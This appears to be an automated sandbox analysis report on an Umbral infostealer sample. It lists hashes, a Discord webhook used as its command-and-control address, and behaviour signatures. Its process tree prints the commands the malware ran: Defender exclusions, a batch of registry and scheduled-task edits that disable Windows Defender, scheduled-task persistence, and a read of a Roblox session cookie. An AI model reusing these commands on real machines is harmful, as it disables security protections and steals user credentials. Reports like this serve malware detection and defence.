Analysis

  • max time kernel
    75s
  • max time network
    77s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    20-07-2024 13:12

General

  • Target

    XBinderOutput.exe

  • Size

    15.7MB

  • MD5

    f97888b27442ca3d39172b7c6b807452

  • SHA1

    1e414410cd51c6a118209b6883923a844aabb73f

  • SHA256

    58e72a5d8fa13efff7500e9bcdb98d73cd56ef214c1739bd09970921f69600d8

  • SHA512

    ac53a3ef560de8c5e7ebe845f9a4e2a1792838de160349bb6f2ba614eea6986d302b470c17c5ee5cbb6c56d2c2bdeaec78a96bda1d0f157685d4d874818a00e1

  • SSDEEP

    393216:XjKwRngl0YQi+q8d6CqRgY3ExKp7609UqSsMpBqqt8fFaCEA:XjrRglnQfwCqRgYUYp7L2cqC9a9A

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1263969302936031242/olHrwbuoNh8UxVs0Eh00oYjpj3hs8m4JFfGFTZq-qdru9A_R06a4zPTH8NVHDmX7Crj_

Signatures

  • Detect Umbral payload 3 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 6 IoCs
  • Executes dropped EXE 5 IoCs
  • Identifies Wine through registry keys 2 TTPs 4 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • VMProtect packed file 2 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe
    "C:\Users\Admin\AppData\Local\Temp\XBinderOutput.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2692
    • C:\Users\Admin\AppData\Local\Temp\Micrasoft OneDrive.exe
      "C:\Users\Admin\AppData\Local\Temp\Micrasoft OneDrive.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Drops startup file
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Writes to the Master Boot Record (MBR)
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:32
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Micrasoft OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4636
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Micrasoft OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5756
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Maicrasoft OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4344
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Maicrasoft OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:5736
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Maicrasoft OneDrive" /tr "C:\Users\Admin\AppData\Roaming\Maicrasoft OneDrive.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:3660
    • C:\Users\Admin\AppData\Local\Temp\FanUpdate.exe
      "C:\Users\Admin\AppData\Local\Temp\FanUpdate.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:208
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\avdisable.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4300
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
          4⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:2036
        • C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
          4⤵
            PID:2184
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
            4⤵
              PID:3872
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
              4⤵
                PID:2504
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:2420
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:4904
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:3364
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:4080
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:3144
              • C:\Windows\system32\reg.exe
                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                4⤵
                  PID:4260
                • C:\Windows\system32\reg.exe
                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                  4⤵
                    PID:3516
                  • C:\Windows\system32\reg.exe
                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                    4⤵
                      PID:2124
                    • C:\Windows\system32\reg.exe
                      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                      4⤵
                        PID:4112
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                        4⤵
                          PID:2260
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                          4⤵
                            PID:2256
                          • C:\Windows\system32\schtasks.exe
                            schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                            4⤵
                              PID:4388
                            • C:\Windows\system32\schtasks.exe
                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                              4⤵
                                PID:3660
                              • C:\Windows\system32\schtasks.exe
                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                4⤵
                                  PID:4616
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                  4⤵
                                    PID:812
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                    4⤵
                                      PID:2144
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                      4⤵
                                        PID:4892
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                        4⤵
                                          PID:4652
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                          4⤵
                                          • Modifies registry class
                                          PID:2260
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                          4⤵
                                          • Modifies registry class
                                          PID:3872
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                          4⤵
                                          • Modifies registry class
                                          PID:3548
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                          4⤵
                                            PID:2524
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                            4⤵
                                              PID:2276
                                            • C:\Windows\system32\reg.exe
                                              reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                              4⤵
                                                PID:2684
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                4⤵
                                                  PID:5736
                                                • C:\Windows\system32\reg.exe
                                                  reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                  4⤵
                                                  • Modifies security service
                                                  PID:5868
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\clear_av.bat" "
                                                3⤵
                                                  PID:2052
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\anti_pros_disp.bat" "
                                                  3⤵
                                                    PID:1420
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FunChecker.bat" "
                                                    3⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:3056
                                                    • C:\Windows\system32\chcp.com
                                                      chcp 65001
                                                      4⤵
                                                        PID:972
                                                    • C:\Users\Admin\AppData\Local\Temp\system32.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\system32.exe"
                                                      3⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Drops file in Drivers directory
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Checks whether UAC is enabled
                                                      • Writes to the Master Boot Record (MBR)
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:4104
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\system32.exe'
                                                        4⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4276
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5304
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                        4⤵
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5428
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                        4⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3924
                                                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                        "wmic.exe" os get Caption
                                                        4⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:700
                                                      • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                        "wmic.exe" computersystem get totalphysicalmemory
                                                        4⤵
                                                          PID:3584
                                                        • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                          "wmic.exe" csproduct get uuid
                                                          4⤵
                                                            PID:6052
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                            4⤵
                                                              PID:812
                                                            • C:\Windows\SysWOW64\Wbem\wmic.exe
                                                              "wmic" path win32_VideoController get name
                                                              4⤵
                                                              • Detects videocard installed
                                                              PID:5368
                                                          • C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe"
                                                            3⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Drops startup file
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Adds Run key to start application
                                                            • Checks whether UAC is enabled
                                                            • Writes to the Master Boot Record (MBR)
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1888
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft OneDrive.exe'
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4080
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5456
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft OneDrive.exe'
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5228
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft OneDrive.exe'
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5504
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft OneDrive" /tr "C:\Users\Admin\AppData\Roaming\Microsoft OneDrive.exe"
                                                              4⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:5236
                                                          • C:\Users\Admin\AppData\Local\Temp\XClient.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
                                                            3⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Drops startup file
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Adds Run key to start application
                                                            • Checks whether UAC is enabled
                                                            • Writes to the Master Boot Record (MBR)
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:4332
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5604
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4216
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\FunCheker.exe'
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:860
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FunCheker.exe'
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:6064
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "FunCheker" /tr "C:\Users\Admin\AppData\Roaming\FunCheker.exe"
                                                              4⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:5332
                                                      • C:\Windows\system32\taskmgr.exe
                                                        "C:\Windows\system32\taskmgr.exe" /4
                                                        1⤵
                                                        • Drops file in Windows directory
                                                        • Checks SCSI registry key(s)
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        PID:3064

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\ProgramData\mntemp

                                                        Filesize

                                                        16B

                                                        MD5

                                                        7dda9de37adca67d713ad7f8a1c1ed97

                                                        SHA1

                                                        3ba41fe5b0578652bc8f8c4666297e5e3874590d

                                                        SHA256

                                                        168d4446b19c226ec58c0c73d01d57cef87a1493306f03b5004f87b1699c6d56

                                                        SHA512

                                                        f52ab7cdc55b678560520df6fa7f4d8ba692c87dce49650a13df1cd6de06444fa090c3f4c99349537178ba018cc308bdb28a84c8ff33fd74e585dd74740cef74

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        1c19c16e21c97ed42d5beabc93391fc5

                                                        SHA1

                                                        8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

                                                        SHA256

                                                        1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

                                                        SHA512

                                                        7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        7dd5247d943ddcdc53b248d63e647260

                                                        SHA1

                                                        1fe37eaa066770f5518c52d40820800e2ef41233

                                                        SHA256

                                                        4a11e8f817f329e8be68cdfa5f768e380f659c8b904b09b283c17144ce283d56

                                                        SHA512

                                                        39914303c8ca505e884c2d1bb662a7b3270174f40fedfee6c7212f2f356043146476182f43c873d0d3920cb60a41897a2275b9f6a7ddb98b8d277b556fb121c1

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        63e46f2c9db4d1b4592279444d5d68f7

                                                        SHA1

                                                        ba55647c00540aa9c36f1c11d0a6c1fa4e0be285

                                                        SHA256

                                                        3afe27fee6e492b21d73a8d7c976eb7809e7d626bac58cb25c434b3a6521876c

                                                        SHA512

                                                        505218f5b4a4dbf10b5d10ad2a6049bfb48f785e48fb5621023bf4d87dcaaa52e85de1045e61fc1f37c65b3ebc79bb5470e0399a807b80e6b04da654daae8a0a

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        15KB

                                                        MD5

                                                        acb5cbd74c0d867dcbfa0fd40e3d090b

                                                        SHA1

                                                        d464f5b9c51d72c9cf663f18782590688f42186a

                                                        SHA256

                                                        c71d6a540f294e81c5a8161eac55fdbb91fe72b8b77e7e731f6dff8f183f22d7

                                                        SHA512

                                                        90e5ad660e9a4de418a3d249c5dffb478434ffa4d9e54e7f1dbfa71939e4cea0188fc3d93b07be1a9d4f9e8d61eef7815689430f29eb7fb0207ae4eb5e6851c9

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        33ac4769e2f364ff13971103ad419b70

                                                        SHA1

                                                        82507e237fb4974324864078fe26905d70106e43

                                                        SHA256

                                                        2c595a19e2eb9efb3ba74cadcd0363bcc27b1ad19f6d438b4a004d7873747921

                                                        SHA512

                                                        ca394498c885b8aba4fc8124cb26aa334b194bc54bf7a779ad9bd4c759a41cb17d59645f762241070ceedd661721afd17411070f0e56445d43e327d59ce4eb08

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        d39743c1d341a15188677f97ab809dbe

                                                        SHA1

                                                        8ac54321616d0634a921813465cff6db979fcf39

                                                        SHA256

                                                        60e7e619f2e3c9fa0c5706bbe8a22070707949457bce500632dddd444c4ced6d

                                                        SHA512

                                                        cd810098040fbf3a4e330633f4c2a035566aa22af9894653b0270e64038ba87946a698f715ad9f10f7fc9b75c401059cf1b2ff7bd67884e45a28c173eb8f79ae

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        d91fbc24074411fe9b75589b4b58cf52

                                                        SHA1

                                                        773e1e314a9648acea57032446c85ab98684a259

                                                        SHA256

                                                        6fc50779a0e64a6a4776ad0d2efacfc8b860e42e68ed8a410b83b69b28d5a7d6

                                                        SHA512

                                                        bda78c730d0f1ac36920c6d1b3a342a14c7553118be5aa59eeb35611287e3695b34130a0391244d25ed11ec670bfc040985341505ded5a3760e2e178e96c38b9

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        15b477ab78c2062d17c724288b2198dd

                                                        SHA1

                                                        49235cd1ee187745b64c976f5150e7a7297c90da

                                                        SHA256

                                                        3ca4a34d77f2b40db292cb7a243f8514762b97338242f5b0028880398478215d

                                                        SHA512

                                                        79f73beeb31c9736ae0d608acdc7b685afe44894da4503fa16f44c7bce10c51aa7d52f5a7d52f92b719f1aa0cee0cfb6ec685203dc4c7bfd052127c2250e3210

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        5709d7bd8e1965c52df692caaa64dda1

                                                        SHA1

                                                        eacb2da4d69baa8022763e80c15c614860dc0041

                                                        SHA256

                                                        f071d8820e211dae2dcdebdcdb3239e18ccd47f0a941f86ec0831a99b44b5d7c

                                                        SHA512

                                                        a16465afcfbbc7e4ee4371c67f0fc3bde4ebde029707dfaf6cd7d34ec537bc5651e8352180a427e32846f948e0956af96475004b34f9f6d171dd8317334b46f9

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        592710860ad0c551d3dab962fafd682a

                                                        SHA1

                                                        2e1b7d90000e77ae07f27bc41522945a37c1bd7e

                                                        SHA256

                                                        e88ab1fe076d4e336d4b4d216ccd371120194a6767f4807e4129f28967be3bf6

                                                        SHA512

                                                        d7ca7b89f59673a48ce368fd8faedb93bfeaa1196e8b312156cafa3da16892bf173c45409dd749b175f98cda1d846e4a9a0c42f1347c96df6e125c9435c29ca3

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        147c106c30ebbced194371a12c93e5a3

                                                        SHA1

                                                        563aebe21ee5a9a1cfeb9949e0af5dba5eb9f93c

                                                        SHA256

                                                        54f78b09a9cf00c77289e71d5cbd0fdb75a3b250f6d8627967020dea4c13a9d7

                                                        SHA512

                                                        4e6e1a8cc448a606ba4cfa7d9bbbba42e81baa3faa6231ffb7eee242b30b13ff8b4d76891e75d0f840ba006d3e8c35cd2cc4a61887011243f16968f0e02053a0

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        18KB

                                                        MD5

                                                        082ddf5efcff7bba5a0cccf84df76419

                                                        SHA1

                                                        2ca4c7b235d0caa7f03d84749df61eb8ecc0c688

                                                        SHA256

